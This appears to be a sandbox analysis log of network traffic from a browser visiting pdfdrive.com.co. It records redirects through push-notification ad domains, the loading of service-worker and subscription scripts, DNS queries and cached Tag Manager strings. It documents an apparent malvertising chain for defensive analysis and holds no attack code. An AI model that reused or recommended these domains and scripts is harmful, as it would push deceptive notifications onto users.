Source: global traffic	HTTP traffic detected: GET /icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog HTTP/1.1Host: want-some-psh.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog?wch=6780df4b HTTP/1.1Host: want-some-psh.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /creatives/888/527/192_0_1736428969326.png HTTP/1.1Host: cdn4image.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /creatives/888/527/192_0_1736428969326.png HTTP/1.1Host: cdn4image.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /v2/641/e977ce71-cf2f-11ef-90a7-5eb0b9f2b61c/1/ic HTTP/1.1Host: icon.eu.ptmnd.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog HTTP/1.1Host: want-some-psh.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog?wch=6780df51 HTTP/1.1Host: want-some-psh.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /push?clientId=1db9169f-90f4-4b2d-b517-bc47aab19c1f&clickId=oy2jl-meps1dn1ub8 HTTP/1.1Host: fleraprt.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: /Origin: https://pdfdrive.com.coSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pdfdrive.com.co/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /push?clientId=1db9169f-90f4-4b2d-b517-bc47aab19c1f&clickId=oy2jl-meps1dn1ub8 HTTP/1.1Host: fleraprt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /b2/l/c/redir?asid=3263414584SGiLPZHx&cid=5&did=RV1ST3s&eid=15328&n=f3f38a527a1ea99b2925c598&nid=10004&sid=maH16AVIvMiWF8nVqgoBWetUHKn0qeXN0D0vMNkKmpiqSGOaPrn6uIa88qdt6FQmro5CtGrTdE1Au4f3TUBBuk%2BoDw8BD%2Fmq5ByQ4ttTkIEZJbct48jGEXFqMfKq7%2BEswwytUeh%2FQ%2Fr9e42PtSg%2FpkjfiKcUk7GhOIgRYS3MAl6sFFkITyIUkF66cYEJQYvZ9JVO242IKPDCcEd7z7d9NQuMZ2n76g2sbSLqE6yMpyuGV%2BBmLKPl%2ByLfSAkAc5AQWuvrwMwmHOjymf9LWb8mo2%2BJdhy3Q11woi96q0fLIT5KwdgTkvnd%2F7PGgSwlNr3hkJfaO%2BAzDkbi09fiMEkfaB3k5vgMx1vBQJHD%2BCEJOlvauo6M6lQARnC7ZvArxHMMIZ7wgHsVxUb0%2FDY0DS%2F7amR8vD87W1WaHysq5iFWOp%2BRn3o%2BZEdxOQnVGS%2Fgqm4Di1BVUlqYrylQhK2lOuj64knKqeK77FuxIOj5Jx3XwTsuRS6avLcoRqaeVgB9kfnudiC%2FnioEq4hAI8OGBWgITJw8Agng6e7uMw9mqmY2DgEwd4MyT%2BhRTfBctOr12V50kJPqVkOB4%2FavFMi9fqPJaHA%2BwcMYz%2FhdhtHO%2FYJhDZ6LAJgKuuoBjQNwZL4L0UuCHML%2BwaithTZJw5LAjAzscXHNpFvbFGC5SyTgjXzb4XlOl600N%2F5yMl%2BuzJAAZobGTv7F%2Ba0YeSky%2F1j4kicLfs3Vp7pkEuKjbmdBzxrY%2By%2FBfEHmv3KxxuxN4cjqZbwjZfCTA%2FJUS5FwnfQBMSI2DxgBj%2FASb6Au1gg%2BsuZnREIJCk%2BtqGw9dSEJTNq3w8pDsgvD2q3nRtkF4kFz9tHQJxa2B6KWXFekW%2BB4L8PNqXpzymU9N4DDrmsisqip%2BfhmXyPerFTFjGyN5Xk3XtYlmtx8O7HZpDaHHM4t2Gi%2BS5upBLxNPxUvT1%2Bfdiysf6y5qP98rl4rni3dFs2jsbYLDEy4LLkLTsLzcjzhcEsGUt7jcKSVIb06NpzBdtq7COTk55PHfbHdkSFHwBYx9p%2FsmotaG6yMYtsMYp6GdYHzA14gXXDEGUvM7PEZk5dhzOh%2BGRmspY%2FkhiHvcF94MZgnN6BVT3uA9z%2BiK0JYHawyogGJ8w%2BPhub2s58q5k4vFdrnxwyBcVuFP12lSaJEwboSR8e%2FXhA5VxM4aJ4lCWQHsqiH6GCPtLJuQleivCtW286%2Bajs%2FI3cLPFZkiqXCr4XsqehoF6R33IlBEqz%2FwOg%2BeLr4i9rWorEZA7ULqZIhZ9Q%2FGlSDc0yl9abrnfkbLOv3W1FW24Aw1Qg2FR%2FfYoaDR2ctdU7XJWKRWNZOBPLik%2FN1BYfU2ASqFwF0Ny3P6KfZg5G16Vln2mNpJ%2BKsNvz5Ty%2Fg10DvkYmafI0neNXgxcDwhyKv1HL%2FAMQMrqRPopaohS2ipZRG6%2F2RfBAuRXmARtcZwzdaRNAOkITd2dXxhAxEIp6lSpkxdXZGwwgfg%2BaNztJj3JJouRJzikC7%2BBQf2EYDoojIi6KExKCHna%2BH3%2Fi4l%2BsQ5OKawdeY7iW%2BDxmmY3VvleY3Pmeg%2FpS7Pfj3y%2FXt0VZLNKvccyfNgQxnkM2mUTUXn5FX7F1d4ASuQQUeDK27ge2Sf%2BaKS0w26RElAeDX5NSixMY0&ssid=3263414584SGiLPZHx&ts=1736499016&ttl=86400&v=v5.14.4 HTTP/1.1Host: realpush.realsh.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: realpush.realsh.xyzConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: adcsid-c-3263414584SGiLPZHx=1
Source: global traffic	HTTP traffic detected: GET /v2/641/e977ce71-cf2f-11ef-90a7-5eb0b9f2b61c/1/cl HTTP/1.1Host: srv.eu.ptmnd.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /clk/zv_BDuRo4YlIQQ_Z7aN562cncnqTVheZtbAmNFn7LlMtwJAN2ko4jlv-s1wS53BUWPCXWvzQQ5jm38q0lYAE3ZwLmfsbv9fZFKvS_4Dlz8C2qn6FsqRfRm8F5-Dk0ZKeUUPs-iVZbIJOtl9WTpKzrlxH4bSzZVrMDftH_vnqZijXJBDtgyifvvERgX34IfgxQ0c1Tcp7E9PyEwnP2uuq9emDtJY8oAC6sSom3TfPkAwScJmeY1NSIPNF7Fvsa9gPQCwADGERlKbiyUC7NHb0u9gX8qz2HX1B0OW7ZkyPUD_hH2zx8065u0HIIinHZEB3Ni1NluJZiXg_cWWPFFhWEXM7lXDBShKMx_U3WnX-DvJsz-b4jG-4HQjScnCy9Nsewm842sC635JWmX0X380v26uv1miZLYtpy6ewwHx8Yzg6OUufFKw8caFjuKUN5AuY8r02FLA2m-yNLi97BAn4giWK1-PuJjzuP19_FpG7luu-YWYugDBMnSNDbQdYwRU2x2gfQUOnqyv634lbbV8YIr8AzjrXLt1XVpxqsLBseTBp5iekUSXDj90wHh7vE6aE3KlClebKps9uQgsST2tK0vlCfBZS2ewhVAxpWEPM6drqMtkrX8tIK-M3eoXQMSlN6tYdjIECmTTwivnUdTtFK70cJD6wONuGAW0ZS8-epWpm4r-Ajj-7qwjwyD0xn8N0--QFQ3chZh7heP5PHmk_i47wC7Th7Ch8Lv6a2eqkLnoWdSXq3HK3o6ZrhnU-ZT4ksbFondtcF7NZdojl08Pexk-HeA4cOVgn8dz2_PaKf5zvFGAQnnUW_1rYFpM HTTP/1.1Host: want-some-psh.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /i/click HTTP/1.1Host: srv.eu.ptmnd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=A70CDCFC29427FFFBA231E6EA6D3FC7B; ip-e6n8frthp82hfj80pfjp202lds=1
Source: global traffic	HTTP traffic detected: GET /01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44nFZoz502cOiFrgHoAY74HoAC4-2AtNvYv6MC&t1=506894&t2=2851560&tsid=16&clickid=cu0dup0hubcc73dr63tg&domain=open-2-view.com&lp_key=173647eae38e52225bc6a7306d6dc00a35b3599344&scenario=2&img=1 HTTP/1.1Host: cu0dup0hubcc73dr63tg.controlrushprotocol.co.inConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.7.1.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.insec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.7.1.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /subscription.js HTTP/1.1Host: cu0dup0hubcc73dr63tg.controlrushprotocol.co.inConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /subscription.js HTTP/1.1Host: cu0dup0hubcc73dr63tg.controlrushprotocol.co.inConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /www/images/7d20cd775493a41ac0770dfe82476b07.jpg HTTP/1.1Host: onmanectrictor.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pdfdrive.com.co/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /www/images/7d20cd775493a41ac0770dfe82476b07.jpg HTTP/1.1Host: onmanectrictor.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: /Origin: https://pdfdrive.com.coSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pdfdrive.com.co/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sw.js HTTP/1.1Host: cu0dup0hubcc73dr63tg.controlrushprotocol.co.inConnection: keep-aliveCache-Control: max-age=0Accept: /Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /worker.js HTTP/1.1Host: pushtorm.netConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /www/images/7d20cd775493a41ac0770dfe82476b07.jpg HTTP/1.1Host: onmanectrictor.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pdfdrive.com.co/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /www/images/7d20cd775493a41ac0770dfe82476b07.jpg HTTP/1.1Host: onmanectrictor.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: /Origin: https://pdfdrive.com.coSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pdfdrive.com.co/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Cache-Control: max-age = 3600Connection: Keep-AliveAccept: /If-Modified-Since: Mon, 12 Feb 2024 22:07:27 GMTIf-None-Match: "65ca969f-2cd"User-Agent: Microsoft-CryptoAPI/10.0Host: x1.c.lencr.org

Source: chromecache_134.2.dr, chromecache_160.2.dr	String found in binary or memory: Math.round(q);t["gtm.videoElapsedTime"]=Math.round(f);t["gtm.videoPercent"]=r;t["gtm.videoVisible"]=u;return t},Nk:function(){e=nb()},Kd:function(){d()}}};var Vb=wa(["data-gtm-yt-inspected-"]),QE=["www.youtube.com","www.youtube-nocookie.com"],RE,SE=!1; equals www.youtube.com (Youtube)
Source: chromecache_134.2.dr, chromecache_160.2.dr	String found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var k=vC(a,c,e);U(121);if(k["gtm.elementUrl"]==="https://www.facebook.com/tr/")return U(122),!0;if(d&&f){for(var m=yb(b,g.length),n=0;n<g.length;++n)g[n](k,m);return m.done}for(var p=0;p<g.length;++p)g[p](k,function(){});return!0},yC=function(){var a=[],b=function(c){return bb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
Source: chromecache_134.2.dr, chromecache_160.2.dr	String found in binary or memory: if(!(e\|\|f\|\|g\|\|k.length\|\|m.length))return;var p={Kh:e,Ih:f,Jh:g,ri:k,si:m,bf:n,Mb:b},q=A.YT;if(q)return q.ready&&q.ready(d),b;var r=A.onYouTubeIframeAPIReady;A.onYouTubeIframeAPIReady=function(){r&&r();d()};H(function(){for(var u=E.getElementsByTagName("script"),v=u.length,t=0;t<v;t++){var w=u[t].getAttribute("src");if(aF(w,"iframe_api")\|\|aF(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,B=0;B<y;B++)if(!SE&&ZE(x[B],p.bf))return lc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chromecache_134.2.dr, chromecache_160.2.dr	String found in binary or memory: var cE=function(a,b,c,d,e){var f=TB("fsl",c?"nv.mwt":"mwt",0),g;g=c?TB("fsl","nv.ids",[]):TB("fsl","ids",[]);if(!g.length)return!0;var k=YB(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);U(121);if(m==="https://www.facebook.com/tr/")return U(122),!0;k["gtm.elementUrl"]=m;k["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(k["gtm.interactedFormName"]=a.getAttribute("name"));e&&(k["gtm.formSubmitElement"]=e,k["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!DA(k,FA(b, equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: pdfdrive.com.co
Source: global traffic	DNS traffic detected: DNS query: static.cloudflareinsights.com
Source: global traffic	DNS traffic detected: DNS query: shoordaird.com
Source: global traffic	DNS traffic detected: DNS query: site-assets.fontawesome.com
